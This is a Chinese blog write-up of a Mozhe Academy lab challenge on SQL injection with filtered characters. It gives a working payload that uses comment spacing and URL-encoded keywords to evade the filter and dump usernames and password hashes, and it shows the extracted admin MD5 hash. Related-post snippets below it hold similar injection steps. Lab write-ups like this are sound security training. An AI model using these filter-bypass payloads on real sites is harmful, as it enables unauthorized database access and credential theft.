墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)

已于 2022-12-03 12:44:43 修改
阅读量385 收藏
点赞数
分类专栏: 日常练习 CTF 文章标签: sql 安全 数据库
于 2022-12-03 12:43:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46684679/article/details/128160211
版权

SQL过滤字符后手工注入漏洞测试(第2题)

fuzz:一些常用字符串被禁用,所有需要想办法绕过,根据提示可以使用URL编码绕过

思路:找到注入点,对常用字符串进行URL编码

URL编码表

payload:
http://124.70.71.251:43425/new_list.php ?id=-1/**/%55nion/**/%53elect/**/1,2,group_concat(name,password),4/**/fro%6d/**/stormgroup_member--+

请添加图片描述
adminde3fd9cf472af81153330806963ac7a9,用户admin,密码需要md5解密,登录后有key

伽蓝之堂
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
墨者安全专家第二代 彻底免疫未知病毒
11-02
墨者安全专家第二代为您彻底免疫未知病毒,并且提供终身免费国际杀毒品牌趋势科技的优质产品! 墨者安全专家第二代是融合了反rootkit技术、用户权限管理技术和白名单技术并有机集成的免疫“革离”技术。同时第二代集...
墨者SQL过滤字符手工注入漏洞测试(第3)
wswr的博客
03-18 924
思路:首先试一下单引号先,发现报错,这里发现报错就能用报错注入的方式解决,具体操作看别的(用这种方法我是成功了),然后按照普通注入的正常玩法的话,发现注入点,判断这应该是字符型,然后试着闭合,发现也可以,欸,那就是正常注入了 总结:先判断注入点,注入类型,然后正常一套操作,order by不行就再试试select,(实在不行报错注入的方法也能做),然后就算遇到特殊字符的库名表名要注意用编码,还有反单引号的应用 ps:关于反单引号的知识点【原本是拿来防止把正常的字符当成保留字符,即 别把表名为sele
墨者学院SQL过滤字符手工注入漏洞测试
没事我溜达
03-16 1170
靶场地址: SQL过滤字符手工注入漏洞测试(第1)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 关于CTFHUB中的sql注入以及文件上传知识点我们已经学习过一遍了,如果大家都掌握的话,那我们也算是过了入门这个关了。 今天来学习墨者学院中的字符过滤靶场 我们打开靶场 我们进到靶场看到一个登录页面 看到这我也是很激动呀,打开BP就是一顿爆破,结果没爆破出来.. 然后仔细看到下方有个导航条我我们点进去 注意看这个URL,我就怀疑注入点在这里,然后打开.
墨者学院SQL过滤字符手工注入漏洞测试(第2)
没事我溜达
03-19 2232
过滤了空格、union、and、select等数据库查询关键字符
SQL过滤字符手工注入漏洞测试(第2)——<墨者学院漏洞记录>
chick11的博客
07-16 209
http://219.153.49.228:40519/new_list.php?id=1 http://219.153.49.228:40519/new_list.php?id=1' http://219.153.49.228:40519/new_list.php?id=1'%23 http://219.153.49.228:40519/new_list.php?id=1' and 1=1 经过上面几轮测试,可以看出本:空格,单引号,等号,union,select,from都过滤。 因此进行替换:
SQL注入--第二关详细讲解
MAY的博客
04-18 996
SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
墨者靶场-SQL过滤字符手工注入漏洞测试(第1)
shy的博客
11-15 284
墨者学习 By/shy014 进去首页又看到熟悉的公告 通过简单的测试,确定存在sql注入漏洞,但是输入and 1=1 ,and 1=2,order by,union select ,and都没...
墨者-SQL过滤字符手工注入漏洞测试(第1)
zr1213159840的博客
12-10 831
和以前的简单目一样,看目的提示以及自己的测试知道过滤了=,–+,空格符号。等于可以使用like进行替代,空格可以使用/**/进行替代。最主要的,感觉目给了误解,没有说准确,目说url加密,但是经过测试直接选在网上选择url加密的链接并不行,最后测试是url网址16进制加密才可以,链接如下 url16进制加密 下面开始正式步骤: 首先是测试是否存在注入,将id=1改成id=2,没得显示,可能存在漏洞。 然后我们再测试下id=1 and 1=1和and 1=2行不行,需要注意的是,需要对空格以及=进
墨者学院----SQL过滤字符手工注入漏洞测试(第1)
qq_43590351的博客
01-22 413
SQL过滤字符手工注入漏洞测试(第1) 按照基本流程我们在url中输入单引号报错,说明存在SQL注入,但是在输入order by union select发现页面 保持正常,有可能我们输入的字符过滤 过滤的"="号可以利用like代替,空格用==/**/==代替 判断字段数 /**/order/**/by/**/4 介绍一个在线的url编码解码网站 http://web.chacuo.net/charseturlencode 由于被过滤所以我们要进行url的编码。%2f%2a%2a%2f%6f%7
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者有巨子腹-居秦阅读答案墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案墨者有巨子腹.docx
PostgreSQL的视图pg_class
lee_vincent1的博客
06-02 1083
在 PostgreSQL 中,pg_class是一个系统目录表,用于存储所有关系(如表、索引、视图、序列等)的元数据。pg_class是数据库系统的重要组成部分,包含了关于每个关系的具体信息。pg_class。
【Hive SQL 每日一】统计每月用户购买商品的种类分布
JIE的博客 --- moon_coder
06-02 327
所以,我们需要先过滤出每个月份符合这个条件的用户ID,由用户ID和月份构建联合键,完成过滤后,再去进行统计。需求说明中,要求我们统计每月各个商品种类的销售分布数据,前提是,只有当用户在当月的下单次数。统计每月用户购买商品的种类分布,每个用户当月的下单次数至少达到。本的要点在于,如何筛选出我们想要的数据。、category_name 升序排列。时,才被作为有效数据进行统计。次及以上才进行统计。
SQL笔记day8——SQL进阶——表与索引操作
qq_47966193的博客
06-02 387
我的答案复盘:有了主键就不用写not nul了。
基础—SQL—DQL(数据查询语言)聚合函数
m0_74363339的博客
05-30 586
这篇博客主要讲到了SQL分类中的DQL(数据查询语言)—聚合函数的讲解,聚合函数比较简单,但它主要配合着分组查询进行数据查询的操作,注意NULL的字段值不参与聚合函数的运算......
Spring Bean 的生命周期
最新发布
人生苦短,我用python
06-05 207
【代码】Spring Bean 的生命周期。
家庭理财管理系统(含源码+sql+视频导入教程+文档)
stopTheworld2022的博客
05-30 877
家庭理财管理系统拥有两种角色: 管理员:财务管理、财务类型管理、财务计划管理、家庭财务报表、用户管理、支出排行等 家庭成员:添加个人财务计划、查看家庭支出收入等信息
墨者-sql手工注入漏洞测试
04-29
在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值